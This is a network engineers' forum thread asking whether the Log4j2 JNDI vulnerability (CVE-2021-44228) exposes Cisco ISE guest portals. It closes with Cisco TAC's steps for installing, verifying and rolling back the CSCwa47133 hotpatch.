Solved: Regarding CSCwa47133; CVE-2021-44228 - Apache Log4j2 JNDI and ISE vuln

Mats Nilson · ‎12-13-2021

Hello fellow engineers/consultants.

Have anyone seen the impact on ISE related to Guest portals and authentication?

CVE-2021-44228 - Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

We have a setup of ISE appliances with Guest portals assigned to separate public interfaces and the authentication/authorisation is split to separate inside interfaces. No LDAP/AD authentication is involved.

Will it still be possible for an attacker on the public side to execute against this vulnerability?

Any suggestion is welcomed

Leo Laohoo · ‎12-15-2021

Patch can be found HERE.

Release Notes (for the patch) can be found HERE.

NOTE: Patch only apply to ISE 2.4, 2.6, 2.7 or 3.0.

View solution in original post

Leo Laohoo · ‎12-13-2021

The list of affected products can be found here: Vulnerability in Apache Log4j Library Affecting Cisco Products

Fixes are not yet out.

Mats Nilson · ‎12-13-2021

Hi Leo.

Yes I have read these, but do you have any ide if it is possible fon an attack over different portals on different interfaces in the same applicnce?

SIncere Regards

//Mats

Leo Laohoo · ‎12-13-2021

Best answer is to raise a TAC Case.

Proper information is currently very scarce.

Evelyn Riha · ‎12-13-2021

As far as I understand the issue, the attack is running over http traffic. And it doesn't matter if use LDAP this is a log4j issue and as ISE is running the affected software component (java + log4j). You can even try blocking outgoing LDAP traffic from ISE but the requests may be also seen as DNS or RMI traffic.

So in short: ISE with Guest Portals is highly at risk.

Mats Nilson · ‎12-13-2021

Thanks Evelyn.

At least we have separated PSN from PAN nodes and the PSN are not managed on the same interface as the guest portals. Probably the best workaround for now is to have more stringent firewall rules. I got a heads up that Cisco developers are working on a fix now.

Network_Sarovani · ‎12-14-2021

what does "ISE with Guest Portals" mean ?

Mats Nilson · ‎12-15-2021

For Guest authentication you can use a technology called CWA (Centralized Web Authenication) where the ISE acts as an external web portal and lets the guest user do the authenication and authorization in ISE and the result is sent back to the WLC as a CoA (Change of Authorization)

There are very good guidelines and documentation for this.

Ciscouserz · ‎12-15-2021

No, the attack exploits logging handled by log4j. This could be in any form. username, in a SMS, in Apple iMessage, http headers.

If a string is handled by log4j in the vulnerable format then java will download a class and run it.

The exploit can also extract info from the environment in a DNS request. ie extract cloud secrets etc....

Leo Laohoo · ‎12-15-2021

Patch can be found HERE.

Release Notes (for the patch) can be found HERE.

NOTE: Patch only apply to ISE 2.4, 2.6, 2.7 or 3.0.

Mats Nilson · ‎12-16-2021

Thanks Leo!

I will consider this thread as solved

Cisco TAC hasn't yet responded or given new advice in our open case.

We'll probably await further input from TAC before proceeding though.

Many thanks for the heads up

Sincere Regards

//Mats

Mats Nilson · ‎12-16-2021

Please note for all of you the correct procedure:

(Given to me by TAC)

First of all, you can find the hotfix and the rollback patch by referring to the below link :
https://software.cisco.com/download/home/283801620/type/283802505/release/Log4j2-fix-2.4-3.0?catid=268438162

Hot patch file : “ise-apply-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz”

Rollback file : “ise-rollback-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz”

Please keep in mind that the Hotpatch is Mandatory on all the nodes in your deployment so you will need to install it on all of the nodes and it can be applied to ISE versions 2.4-3.0.

To install it we first need to upload the files into a reachable repository on ISE, then install it from CLI using below command:

ISE2_2/admin# application install ise-apply-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz <repository_name>

Save the current ADE-OS running configuration? (yes/no) [yes] ? yes

Generating configuration...

Saved the ADE-OS running configuration to startup successfully

Execute the above in all the nodes in your deployment.

Please keep in mind that installing the hotpatch will cause a restart of the ISE services, so you will need to do it in a maintenance window after working hours to avoid any network down situation.

In case you want to upgrade ISE version or patch there will be no need to rollback the hot patch and you can install patches and upgrade on top of the fix.

After the patch upgrade you want to verify that it has been installed successfully:

ise-01/admin# show logging application hotpatch.log
Thu Dec 16 10:33:57 CET 2021 => CSCwa47133_all_common_1 => CSCwa47133

------------------------

So you must expect that all services will restart, but not the server itself. So arrange for a maintenance window.

Sincere Regards

//Mats

Mats Nilson · ‎12-21-2021

Just a minor feedback:

Someone did post a statement regarding hotpaches and ISE and that they must me removed prior to installing ordinary patches.

- That is wrong, or at least with the Log4j2 patch!

I did a checkup with TAC and they say it is not required and that new patches can be installed ontop of this hotfix:

"please note that as per the developers there is no need to rollback the hot patch and you can install patches and upgrade on top of the fix. For more information , please refer to the below read me guide :
https://www.cisco.com/web/software/283802505/159582/README_Hotpatch_CSCwa47133_Log4j2-fix-2.4-3.0.txt "

Regards

//Mats